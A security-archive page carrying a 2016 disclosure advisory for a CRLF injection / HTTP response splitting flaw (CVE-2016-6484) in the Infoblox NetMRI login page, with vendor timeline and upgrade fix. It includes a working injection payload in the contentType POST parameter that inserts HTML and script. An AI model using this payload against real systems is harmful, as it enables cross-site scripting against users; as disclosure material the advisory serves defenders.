exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Infoblox 7.0.1 CRLF Injection / HTTP Response Splitting

Infoblox 7.0.1 CRLF Injection / HTTP Response Splitting
Posted Sep 7, 2016
Authored by Alex Haynes

Infoblox versions 7.0.1 and below suffer from CRLF injection attacks that allow for HTTP response splitting.

tags | exploit, web
advisories | CVE-2016-6484
SHA-256 | 749fa2a00236c2a6f1b578a58b9d7cc3503cade2244f4ad2c45a3833c28789e1

Infoblox 7.0.1 CRLF Injection / HTTP Response Splitting

Change Mirror Download
Exploit Title: [CVE-2016-6484] Infoblox Network Automation CRLF Injection/ HTTP splitting vulnerability
Product: Infoblox Network Automation
Vulnerable Versions: 7.0.1 and all previous versions
Tested Version: 6.9.2
Advisory Publication: 06/09/2016
Vulnerability Type: [CWE-113:] Improper Neutralization of CRLF Sequences in HTTP Headers (HTTP Response Splitting)
CVE Reference: CVE-2016-6484
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------

Vendor:
Infoblox

Product & Version:
Infoblox Network Automation v7.0.1

Vendor URL & Download:
https://www.infoblox.com/products/network-automation

Product Description:
"Infoblox also offers a complementary, powerful network automation platform which enables discovery, switch port management, network change configuration and compliance management for multi-vendor network devices. Automation cuts down administrator workload and reduces risk of network outages due to improper configurations or changes."

(2) Vulnerability Details:
--------------------------
The login page of netmri is vulnerable to a HTTP splitting/CRLF injection.

https://NETMRISERVER/netmri/config/userAdmin/login.tdf

The POST of the login action contains the following parameters, and the contentType parameter can be modified to be reflected in the response header:

skipjackPassword=test&width=100&contentType=application/xml&msg=Please+wait+while+your+credentials+are+validated...&url=%2Fnetmri%2Fconfig%2FuserAdmin%2Flogin.tdf&mode=DO-LOGIN&skipjackUsername=test&multipartFile=&title=Waiting+For+Process&filename=&licenseFile=input.licenseFile&authServerList=192.168.X.X%2C+10.X.X.X

Once we control content-type, we can inject carriage return : %0a and line feed : %0d characters to break the header and introduce our own, effectively splitting the response. We can then introduce our own HTML and/or javascript to provoke a HTML injection or cross-site scripting attack.:

skipjackPassword=test&width=100&contentType=%0d%0aContentLength:%2019%0d%0a%0d%0a<html><h1>Injected HTML</h1><script>alert(xss);</script><!--</html>
&msg=Please+wait+while+your+credentials+are+validated...&url=%2Fnetmri%2Fconfig%2FuserAdmin%2Flogin.tdf&mode=DO-LOGIN&skipjackUsername=test&multipartFile=&title=Waiting+For+Process&filename=&licenseFile=input.licenseFile&authServerList=192.168.X.X%2C+10.X.X.X



(3) Advisory Timeline:
----------------------
25/01/2016 - First Contact informing vendor of vulnerabilities. No response.
01/02/2016 - Follow up e-mail to inform them of vulnerabilities. Response requesting further information.
01/02/2016 - Information on vulnerabilities sent to vendor. No response.
08/02/2016 - follow up e-mail requesting update. Vendor responds asking us to open a support ticket.
12/02/2016 - Infoblox products out of support so cannot raise ticket. write to vendor to explain situation. No response.
24/02/2016 - Follow up with vendor on vulnerabilities requesting an update.
10/03/2016 - Final follow up to vendor requesting an update. Vendor responds and opens support ticket for vulnerabilities, mentioning they will look into vulnerabilities.
14/03/2016 - vendor responds saying they are able to reproduce vulnerabilities
17/03/2016 - Vendor responds saying some of the vulnerabilities are already fixed in version 7.0.4 but cannot confirm which ones.
05/04/2016 - Request update from vendor on status of vulnerabilities.
12/04/2016 - Vendor responds saying CSRF already fixed in 7.0.1, XSS and HTTP Splitting to be fixed in upcoming 7.1.1 - expected release in summer.
30/06/2016 - Patch 7.1.1 released
06/09/2016 - Public disclosure


(4)Solution:
------------
Upgrade to Version 7.1.1


(5) Credits:
------------
Discovered by Alex Haynes
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close